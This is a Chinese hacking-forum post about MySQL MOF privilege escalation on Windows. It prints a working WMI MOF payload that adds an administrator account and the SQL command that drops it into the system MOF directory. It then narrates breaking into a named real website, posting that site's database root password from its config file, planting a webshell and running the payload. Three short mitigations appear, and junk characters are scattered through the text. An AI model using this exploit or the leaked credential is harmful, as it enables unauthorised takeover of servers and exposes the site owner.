中国网络渗透测试联盟

标题: Mysql mof扩展漏洞实例与防范 [打印本页]
作者: admin    时间: 2013-1-4 19:49
标题: Mysql mof扩展漏洞实例与防范
Mysql mof扩展漏洞防范方法7 `6 b$ ~1 k4 Y+ X
4 y$ T* o: `; r. ^9 |' G
网上公开的一些利用代码:
' ~3 `) S. p" u
! H7 N1 S9 m3 s& ]4 R4 n" y4 J#pragma namespace(“\\\\.\\root\\subscription”)  @' ?. H6 _& j

# ~9 ~/ ^) k3 R2 Dinstance of __EventFilter as $EventFilter   {   EventNamespace = “Root\\Cimv2″;   Name  = “filtP2″;   Query = “Select * From __InstanceModificationEvent ”   “Where TargetInstance Isa \”Win32_LocalTime\” ”   “And TargetInstance.Second = 5″;   QueryLanguage = “WQL”;   };   instance of ActiveScriptEventConsumer as $Consumer   {   Name = “consPCSV2″;   ScriptingEngine = “JScript”;   ScriptText =   “var WSH = new ActiveXObject(\”WScript.Shell\”)\nWSH.run(\”net.exe user admin admin /add\”)”;   };   instance of __FilterToConsumerBinding   {   Consumer   = $Consumer;   Filter = $EventFilter;   };
! M( K" ~/ S, A# x; P! i2 y. F7 `- P9 k- [2 E; H; l; k/ X7 D# Z  `6 S
% @* N# K; m1 w# i8 ?5 B3 J+ ^
" H: L7 K; L( g! q8 g* y: _; }

+ C4 O2 ~  [4 }$ U: o7 a. w4 M4 C: J$ e7 v) h6 {
连接mysql数据库后执行: select load_file(‘C:\\RECYCLER\\nullevt.mof’) into dumpfile ‘c:/windows/system32/wbem/mof/nullevt.mof’;
1 x; W$ a) V  t$ k9 n从上面代码来看得出解决办法:& z3 P1 m0 G/ f) C7 s) J

% b: V- v" i1 D2 d+ o1、mysql用户权限控制,禁止 “load_file”、”dumpfile”等函数
4 q4 d3 P5 T6 g5 g: K
! u* r$ R) G; Z* Z$ U5 L6 F2、禁止使用”WScript.Shel”组件% M. v+ N9 \: j! A# h0 k3 k: V8 a

  H* w' J' [7 ~. @3 z; R( Q3、目录权限c:/windows/system32/wbem/mof/ 删除内置特殊组CREATOR OWNER% L% }( z: r' p& t5 [" K1 h, {' k7 N
; J" b% d( C+ a$ ~
当然上面是网上说的 感觉需要的权限很大 比如 root 还有mysql外链昨天碰到了就给大家演示下
* A# u, ^; g* V/ A1 _% _/ C, p! d7 G$ k  K! z- O4 Q8 C
事情是这样发生的  一机油在论坛提问我就看了下 发现已经有大牛搞下了 说是用是 mysql mof扩展提权
( E) X+ |9 i- B0 r$ o* P% E
' J& z4 c% g3 @& |" n; D; P但是小菜发现没有听过于是赶紧去查资料学习…就有了上面的来着网上的内容$ F" i8 a6 \0 }% ^3 b2 c' `3 @, @
3 v5 S, Q$ ?& G5 s: M
看懂了后就开始练手吧
) e: |+ l8 z2 L" ^+ X' |
1 h/ T% n+ v3 M: p; khttp://www.webbmw.com/config/config_ucenter.php 一句话 a
& e) ?6 x6 j3 v% K, Y1 [" w% z# Z, X2 y% Z% R, t8 j" {
$_config['db']['1']['dbhost'] = ‘localhost’; $_config['db']['1']['dbuser'] = ‘root’; $_config['db']['1']['dbpw'] = ‘tfr226206′; $_config['db']['1']['dbcharset'] = ‘gbk’; $_config['db']['1']['pconnect'] = ’0′; $_config['db']['1']['dbname'] = ‘webbmw’; $_config['db']['1']['tablepre'] = ‘pre_’; $_config['db']['common']['slave_except_table'] = ”; 有root密码啊。
% @. r. ~. j& ~/ i% _& V7 i. S# a/ u4 D! C  z1 s" [5 F$ X. d
于是直接用菜刀开搞6 ^5 g1 G5 d5 d  J

: M; L6 l- Z4 |: j, C/ L7 ~上马先+ N& k  f! [6 Q2 w% a
( l! s, h7 {2 K% }0 `
既然有了那些账号 之类的 于是我们就执行吧…….$ H  Q) s8 Z4 ^1 R
$ t( [, p) u5 t: i0 Q! _
小小的说下
! q6 x0 ~. M2 A$ x1 k' z% z  N3 @8 ^( J
在这里第1次执行未成功        原因未知
' @3 K, Z4 l' c5 [7 f
* ^: G& |: D, F0 P5 D: @我就猜想是否是因为我们执行的代码有问题 于是我就去我wooyun找的代码。; F. F- }+ r% r6 [# H2 r

8 h4 Y. b; i/ ?: N#pragma namespace(“\\\\.\\root\\subscription”)5 w; B+ y% H8 ?, q; s; e0 g

% f. ^% }: i1 x; j' j9 C) w8 {instance of __EventFilter as $EventFilter   {   EventNamespace = “Root\\Cimv2″;   Name  = “filtP2″;   Query = “Select * From __InstanceModificationEvent ”   “Where TargetInstance Isa \”Win32_LocalTime\” ”   “And TargetInstance.Second = 5″;   QueryLanguage = “WQL”;   };   instance of ActiveScriptEventConsumer as $Consumer   {   Name = “consPCSV2″;   ScriptingEngine = “JScript”;   ScriptText =   “var WSH = new ActiveXObject(\”WScript.Shell\”)\nWSH.run(\”net.exe user test test /add\”)”;   };   instance of __FilterToConsumerBinding   {   Consumer   = $Consumer;   Filter = $EventFilter;   };
# F$ w% z( i+ |4 J' Z# h! R$ n1 c) m) H; t
我是将文件放到C:\WINDOWS\temp\1.mof
1 v0 v3 l* \6 w$ c" S6 @3 x
3 I1 `# D. b$ s8 A& e3 `  s所以我们就改下执行的代码  ?. \7 n8 K" ]

  o. j3 N; w' B, b- vselect load_file(‘C:\WINDOWS\temp\1.mof‘) into dumpfile ‘c:/windows/system32/wbem/mof/nullevt.mof’;
2 K6 D" j8 T( U, S7 l3 u+ o3 e0 l+ S" L" ?. T4 s8 C0 m
1 T$ d' r9 J) G# Z# y
+ \+ I8 F' l) q4 d7 u' M) a
但是 你会发现账号还是没有躺在那里。。% d7 i# G4 S, A2 I$ I

) b! V' d: B5 o' P: W于是我就感觉蛋疼
9 l# g" {$ a3 A- Y4 @! j& K( R- i8 D0 I
就去一个一个去执行 但是执行到第2个 mysql时就成功了………
, J$ E* c- l% O$ i* u$ G6 J- t9 s4 a4 Q2 H3 B: K+ L- Y4 c

/ F6 Z; V/ Z! p/ E( H" I3 R8 ?6 r% M1 R( E5 D
但是其他库均不成功…
) K: h* g. C: O+ }" h( L; o* q% l. q: q1 W% c2 O
我就很费解呀 到底为什么不成功求大牛解答…
- e3 t7 K7 s3 ~) L% f9 w, V
: Z" L4 T9 c4 r' E; I1 S2 Q& _, t! ~- l6 L

. v3 H- r/ n) `  ~$ i5 t



欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2